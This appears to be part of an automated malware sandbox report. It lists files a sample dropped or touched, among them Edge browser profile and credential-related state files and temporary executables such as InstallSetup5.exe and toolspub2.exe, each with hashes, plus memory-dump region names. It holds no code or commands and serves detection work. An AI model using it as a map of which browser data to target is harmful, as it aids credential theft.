MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

\??\pipe\LOCAL\crashpad_3284_UKMNWTZGJLNTEYXL

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\pipe\LOCAL\crashpad_4036_IWVSAVUPCHUPZMHT

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\pipe\LOCAL\crashpad_3588_JTFLRYJDKICIEKXC

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\pipe\LOCAL\crashpad_3792_IDFJQLLGAGIWQLJJ

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\pipe\LOCAL\crashpad_3528_RRQGCJASDBRBRTPE

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

\??\pipe\LOCAL\crashpad_4404_UZMSWJTFEHSIQWBU

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 088df527a6a6bc1dcf1e7dd71ff4ce6d
SHA1 e0f3132ec559656f53c3373b3421eb4874d3ccc2
SHA256 931eaeaf737d5ba0546215b45d78fb9f8e89c751741e6b5ad9be33bd69558ec3
SHA512 99d53bb61226a03f6267ce2dd5d8f71a834945421f0e9a526a82b2c96db365dc9d321efcfa3a2970c33f3092b39f62de5000898ac8184377bc7bb81555ee97d6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 088df527a6a6bc1dcf1e7dd71ff4ce6d
SHA1 e0f3132ec559656f53c3373b3421eb4874d3ccc2
SHA256 931eaeaf737d5ba0546215b45d78fb9f8e89c751741e6b5ad9be33bd69558ec3
SHA512 99d53bb61226a03f6267ce2dd5d8f71a834945421f0e9a526a82b2c96db365dc9d321efcfa3a2970c33f3092b39f62de5000898ac8184377bc7bb81555ee97d6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 5a23043740f321a7c1904b2beba838ae
SHA1 380dc84d41a14a7861855dd7b279a2538058da56
SHA256 605eb82858469a061673650802ea2a061bc33361f4eee9871661848b01cf2998
SHA512 1e59b0394a446e24917649e38c0464492cae1329609accf487600d91d0455aa3804bbff71ff52236e9ea92980a139edf2aa8d9f9ebf3ee9828d9c570f1ee9879

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 120f46722487cf05d1ae700114309eba
SHA1 cbe117fa170dc35627f9e10da3dc07468b4c09a3
SHA256 108d3a430c5b0c03e4f0556581fbaa84a2ec28f3cb903d53ea69e5382ce1e95c
SHA512 fdfbfa818497c9a4799fd1b975294bfaacf85aa902486af2405a4ae86dc2f6478355c02143f21195f843e125006bb9aab59e760cd32bbb5af251856a88b6bd46

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 d3cc76fe9f99f1cd2ab49f10ced48650
SHA1 0f0008a249a70c5090f7cdd28e3983f6e3c2f78e
SHA256 1cfba527495083db208f8c83525a05e8861e834d88356c1248ee00648e7bee33
SHA512 f8d06a9b5b6e23c869534f6560b68f0894d92bacf2730853c46e40d6ed3f378861bb1561c4bd6eba70ea536bd02339aedf58071a9e43da1a556ef03e47b6bfe4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 d3cc76fe9f99f1cd2ab49f10ced48650
SHA1 0f0008a249a70c5090f7cdd28e3983f6e3c2f78e
SHA256 1cfba527495083db208f8c83525a05e8861e834d88356c1248ee00648e7bee33
SHA512 f8d06a9b5b6e23c869534f6560b68f0894d92bacf2730853c46e40d6ed3f378861bb1561c4bd6eba70ea536bd02339aedf58071a9e43da1a556ef03e47b6bfe4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 d04f2f2095f1159888b4d8674903d7aa
SHA1 f12ef83d630a1290889f207b20feed69aba572fe
SHA256 1e0bb4bdd6f5ebb10538030f21ff2baf8ad025785f0a49bbe407e478feb8f942
SHA512 2e620d05bbd240e1e49014ef6f1eba9b805d242f0c773b2270921e0b54b3bebf40dbb4b27329956eea65081dfbf3afaaa04e2061d42faa04658c9d47cdbe0c59

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\91644906-35ca-427e-9f96-85fa5a6f2816.tmp

MD5 d92328310de55d67bf57c589d63bfa5b
SHA1 68c46938f98519961b5365911076311a5e6b7e12
SHA256 436d7306c4754a29d2aa1c5fd7faa42a32ab9ac3e274e1acaf0d396777a756cf
SHA512 529b7b72d5199e963671ca91a6578140e4691921f48aee0b781f0ae49e381856fa35867ea217c49ad72e0e13e9ea05dece52f456c9922e3fedb2b5df17e64acd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 d04f2f2095f1159888b4d8674903d7aa
SHA1 f12ef83d630a1290889f207b20feed69aba572fe
SHA256 1e0bb4bdd6f5ebb10538030f21ff2baf8ad025785f0a49bbe407e478feb8f942
SHA512 2e620d05bbd240e1e49014ef6f1eba9b805d242f0c773b2270921e0b54b3bebf40dbb4b27329956eea65081dfbf3afaaa04e2061d42faa04658c9d47cdbe0c59

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 5a23043740f321a7c1904b2beba838ae
SHA1 380dc84d41a14a7861855dd7b279a2538058da56
SHA256 605eb82858469a061673650802ea2a061bc33361f4eee9871661848b01cf2998
SHA512 1e59b0394a446e24917649e38c0464492cae1329609accf487600d91d0455aa3804bbff71ff52236e9ea92980a139edf2aa8d9f9ebf3ee9828d9c570f1ee9879

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 120f46722487cf05d1ae700114309eba
SHA1 cbe117fa170dc35627f9e10da3dc07468b4c09a3
SHA256 108d3a430c5b0c03e4f0556581fbaa84a2ec28f3cb903d53ea69e5382ce1e95c
SHA512 fdfbfa818497c9a4799fd1b975294bfaacf85aa902486af2405a4ae86dc2f6478355c02143f21195f843e125006bb9aab59e760cd32bbb5af251856a88b6bd46

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2eF6195.exe

MD5 f364a689197058c4e3ce76212531b8c0
SHA1 0f2d4fb14d18497ab75c23b088b0972546094c71
SHA256 f74ff30f5c215a334f6bc86598bd660ebdc488c4c1c3c343b3a7440bb01d0ed9
SHA512 d874c281e7c6c305a907bb00a9c1b476eaa4c736690789a6789c96b6f0de8c9af706187961b0bd5f5f9c2f294a7e5083410df657c856470dcae7ea52e61c8a3c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 d92328310de55d67bf57c589d63bfa5b
SHA1 68c46938f98519961b5365911076311a5e6b7e12
SHA256 436d7306c4754a29d2aa1c5fd7faa42a32ab9ac3e274e1acaf0d396777a756cf
SHA512 529b7b72d5199e963671ca91a6578140e4691921f48aee0b781f0ae49e381856fa35867ea217c49ad72e0e13e9ea05dece52f456c9922e3fedb2b5df17e64acd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 e534bf363d9331c0e54ebdf8fbe00ac4
SHA1 e8c878f3c2138da15a2332fca7771b1c44fb7e1c
SHA256 cea849e1a4977136b3469c36755ad2167a5e244f77478746608331feec8e955e
SHA512 8e71dab0e5352fe2ab0034f47265531a990e23d61e163deaa9405701890c803dc41a8e18181b38b96144301c298cf3bdaee26b0e6c388c42a522983ccec13d3f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 d04f2f2095f1159888b4d8674903d7aa
SHA1 f12ef83d630a1290889f207b20feed69aba572fe
SHA256 1e0bb4bdd6f5ebb10538030f21ff2baf8ad025785f0a49bbe407e478feb8f942
SHA512 2e620d05bbd240e1e49014ef6f1eba9b805d242f0c773b2270921e0b54b3bebf40dbb4b27329956eea65081dfbf3afaaa04e2061d42faa04658c9d47cdbe0c59

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 d3cc76fe9f99f1cd2ab49f10ced48650
SHA1 0f0008a249a70c5090f7cdd28e3983f6e3c2f78e
SHA256 1cfba527495083db208f8c83525a05e8861e834d88356c1248ee00648e7bee33
SHA512 f8d06a9b5b6e23c869534f6560b68f0894d92bacf2730853c46e40d6ed3f378861bb1561c4bd6eba70ea536bd02339aedf58071a9e43da1a556ef03e47b6bfe4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 e534bf363d9331c0e54ebdf8fbe00ac4
SHA1 e8c878f3c2138da15a2332fca7771b1c44fb7e1c
SHA256 cea849e1a4977136b3469c36755ad2167a5e244f77478746608331feec8e955e
SHA512 8e71dab0e5352fe2ab0034f47265531a990e23d61e163deaa9405701890c803dc41a8e18181b38b96144301c298cf3bdaee26b0e6c388c42a522983ccec13d3f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 e534bf363d9331c0e54ebdf8fbe00ac4
SHA1 e8c878f3c2138da15a2332fca7771b1c44fb7e1c
SHA256 cea849e1a4977136b3469c36755ad2167a5e244f77478746608331feec8e955e
SHA512 8e71dab0e5352fe2ab0034f47265531a990e23d61e163deaa9405701890c803dc41a8e18181b38b96144301c298cf3bdaee26b0e6c388c42a522983ccec13d3f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 d92328310de55d67bf57c589d63bfa5b
SHA1 68c46938f98519961b5365911076311a5e6b7e12
SHA256 436d7306c4754a29d2aa1c5fd7faa42a32ab9ac3e274e1acaf0d396777a756cf
SHA512 529b7b72d5199e963671ca91a6578140e4691921f48aee0b781f0ae49e381856fa35867ea217c49ad72e0e13e9ea05dece52f456c9922e3fedb2b5df17e64acd

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2eF6195.exe

MD5 f364a689197058c4e3ce76212531b8c0
SHA1 0f2d4fb14d18497ab75c23b088b0972546094c71
SHA256 f74ff30f5c215a334f6bc86598bd660ebdc488c4c1c3c343b3a7440bb01d0ed9
SHA512 d874c281e7c6c305a907bb00a9c1b476eaa4c736690789a6789c96b6f0de8c9af706187961b0bd5f5f9c2f294a7e5083410df657c856470dcae7ea52e61c8a3c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 088df527a6a6bc1dcf1e7dd71ff4ce6d
SHA1 e0f3132ec559656f53c3373b3421eb4874d3ccc2
SHA256 931eaeaf737d5ba0546215b45d78fb9f8e89c751741e6b5ad9be33bd69558ec3
SHA512 99d53bb61226a03f6267ce2dd5d8f71a834945421f0e9a526a82b2c96db365dc9d321efcfa3a2970c33f3092b39f62de5000898ac8184377bc7bb81555ee97d6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 120f46722487cf05d1ae700114309eba
SHA1 cbe117fa170dc35627f9e10da3dc07468b4c09a3
SHA256 108d3a430c5b0c03e4f0556581fbaa84a2ec28f3cb903d53ea69e5382ce1e95c
SHA512 fdfbfa818497c9a4799fd1b975294bfaacf85aa902486af2405a4ae86dc2f6478355c02143f21195f843e125006bb9aab59e760cd32bbb5af251856a88b6bd46

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 38b09a731dd805952f02f7422e902253
SHA1 10b4051c00d3f62f8d1e29bcef45af4f1f04185b
SHA256 ea1d145ac2c839af87443c6ced3fe3c177b233452b9332978dbabfab6aa3d4e2
SHA512 dae573372a84f7342238c42a2b8730f20ba8e4825c3231f9f0a18ec9ec96a683ed64c8ec5c48f8ba05c167575f11f634bd55f84330c402a9ec1690d10fe242b8

memory/7808-278-0x0000000000400000-0x0000000000433000-memory.dmp

memory/7808-284-0x0000000000400000-0x0000000000433000-memory.dmp

memory/7808-286-0x0000000000400000-0x0000000000433000-memory.dmp

memory/7808-288-0x0000000000400000-0x0000000000433000-memory.dmp

memory/7196-290-0x0000000000400000-0x000000000040B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 66bf849b2faa59ea07042cec1219091c
SHA1 4a306fd2de906a6cf0616e060acd45541505894d
SHA256 27e803a0a2a177f2741e17cc3f72d684edbaaba2cd3e14185f5a4e84649879ea
SHA512 c4abd21b1cd865654d2cb5933ac604f6d786cb651f2b82137667eb8e4503cb8325575b5a90bbf11bb1a4ba78b8caaea41f5402ce6ae3225b8c7921fcad488202

memory/3296-335-0x00000000031D0000-0x00000000031E6000-memory.dmp

memory/7196-337-0x0000000000400000-0x000000000040B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 5846caf2de0564e131e068aac2438d4b
SHA1 74348a98f3441137984b654d27263191441e3672
SHA256 2e3b14e83bda623286cb7c0987112e51be86a2139e7805f2b82d7013bce2ca2a
SHA512 1792ab390d59b497b0c84dc04acbc28f451a60fc1a3452610c04fe5a80e1756c3fe3330a6d908acb6d531a9cdfe6033b5a006ea0668f4babf1feb6713523a5a7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 3a748249c8b0e04e77ad0d6723e564ff
SHA1 5c4cc0e5453c13ffc91f259ccb36acfb3d3fa729
SHA256 f98f5543c33c0b85b191bb85718ee7845982275130da1f09e904d220f1c6ceed
SHA512 53254db3efd9c075e4f24a915e0963563ce4df26d4771925199a605cd111ae5025a65f778b4d4ed8a9b3e83b558066cd314f37b84115d4d24c58207760174af2

memory/7468-378-0x0000000000400000-0x000000000043C000-memory.dmp

memory/7468-380-0x0000000074AB0000-0x0000000075260000-memory.dmp

memory/7468-381-0x0000000007EF0000-0x0000000008494000-memory.dmp

memory/7468-382-0x0000000007940000-0x00000000079D2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

memory/7468-391-0x0000000005560000-0x0000000005570000-memory.dmp

memory/7468-392-0x0000000005590000-0x000000000559A000-memory.dmp

memory/7468-393-0x0000000008AC0000-0x00000000090D8000-memory.dmp

memory/7468-394-0x0000000007C60000-0x0000000007D6A000-memory.dmp

memory/7468-395-0x0000000007B90000-0x0000000007BA2000-memory.dmp

memory/7468-401-0x0000000007BF0000-0x0000000007C2C000-memory.dmp

memory/7468-407-0x0000000007D70000-0x0000000007DBC000-memory.dmp

memory/5712-410-0x0000000000400000-0x0000000000488000-memory.dmp

memory/5712-420-0x0000000000400000-0x0000000000488000-memory.dmp

memory/5712-421-0x0000000000400000-0x0000000000488000-memory.dmp

memory/5712-423-0x0000000000400000-0x0000000000488000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe586f11.TMP

MD5 aa849080ac3ab4013890cf7f71d39ddc
SHA1 1c7157e41509d8ea7d03e593f12d5b08742756dd
SHA256 b4141c673f9d30910f3f7577fec24bb2a7bbb10086d9d3f3e1c71163fa034bb0
SHA512 e5beec709a70e35a2e4e83fec21b224cd856ca57d7f9e5ee58412412ad860519cf8139f52126df1628406a108b4ee7fafbbe82e8b651848be4117e7013d03008

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 8ab50053d24796c18de308376b5f3733
SHA1 2da86adda6269bb1e63281503b02764fd7d251d0
SHA256 0a6820a1b98711c990ca62362d456a69fd152acde2aede4c461d94cd9dc59233
SHA512 71f2031efa9f0165440e3a2b78920087e43c876dc3314b5024a16d378bec8a9d2d3d38902af9d0c4e0c793a08d45e8d772d786baff91a7bcd98229759e9ca177

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 c74ebdab0fa0d4e7037d8bd763d4bd5f
SHA1 52dc88e6d688517ea4dce90dc00055d7c65f49dc
SHA256 414515e548beb215e7dcebae972a407fa45af5f0ffafd7f76e9bd168433f35e6
SHA512 b28846a520453ef46270dd732d02f6c5883f6f83e8ad2bf09eab9273d9f41d8483d0a844ce409e3591bf5d7f65dfa92a74f8aef2909c1c6034ba1f3b1be2688c

memory/7804-556-0x0000000000540000-0x000000000059A000-memory.dmp

memory/7804-559-0x0000000000400000-0x000000000046F000-memory.dmp

memory/7804-561-0x0000000074AB0000-0x0000000075260000-memory.dmp

memory/7468-562-0x0000000074AB0000-0x0000000075260000-memory.dmp

memory/7804-563-0x00000000075B0000-0x00000000075C0000-memory.dmp

memory/7804-567-0x0000000008100000-0x0000000008166000-memory.dmp

memory/7804-576-0x00000000089D0000-0x0000000008A46000-memory.dmp

memory/7804-583-0x0000000008AA0000-0x0000000008ABE000-memory.dmp

memory/7804-588-0x0000000008B70000-0x0000000008D32000-memory.dmp

memory/7468-589-0x0000000005560000-0x0000000005570000-memory.dmp

memory/7804-590-0x0000000008D50000-0x000000000927C000-memory.dmp

memory/7804-592-0x0000000002380000-0x00000000023D0000-memory.dmp

memory/7508-604-0x0000000074AB0000-0x0000000075260000-memory.dmp

memory/7508-605-0x0000000000AF0000-0x000000000178A000-memory.dmp

memory/5860-610-0x00000281B86E0000-0x00000281B87CE000-memory.dmp

memory/5860-611-0x00000281BA530000-0x00000281BA610000-memory.dmp

memory/5860-613-0x00000281D2D50000-0x00000281D2E30000-memory.dmp

memory/5860-614-0x00007FF840460000-0x00007FF840F21000-memory.dmp

memory/5860-615-0x00000281B8BD0000-0x00000281B8BE0000-memory.dmp

memory/5860-616-0x00000281D2E30000-0x00000281D2EF8000-memory.dmp

memory/5860-617-0x00000281D3000000-0x00000281D30C8000-memory.dmp

memory/5860-620-0x00000281D30D0000-0x00000281D311C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

MD5 bc3354a4cd405a2f2f98e8b343a7d08d
SHA1 4880d2a987354a3163461fddd2422e905976c5b2
SHA256 fffc160a4c555057143383fec606841cd2c319f79f52596e0d27322a677dca0b
SHA512 fe349af0497e2aa6933b1acfea9fecd2c1f16da009a06ac7d7f638353283da3ef04e9c3520d33bae6e15ea6190420a27be97f46e5553a538b661af226c241c6b

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 dcbd05276d11111f2dd2a7edf52e3386
SHA1 f5dc6d418d9fb2d2cfa4af440ec4ff78da8f11ec
SHA256 cea5245bab036b03f89d549c71f47df8a14854b0de515643bf95319ec5af71d4
SHA512 5f1a9c993cd5394e23b39c43cc7479355c922d1ee8ea48109bbad805209dee697e20759257eca9e2f1b75d34a8c4b4c428a736fa8a468dc18de6c44cb6394846

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 c067b4583e122ce237ff22e9c2462f87
SHA1 8a4545391b205291f0c0ee90c504dc458732f4ed
SHA256 a16dbcd03a7549fbaf7cad1bedd01dcb961a5d43c873f1d1a50892618a06662e
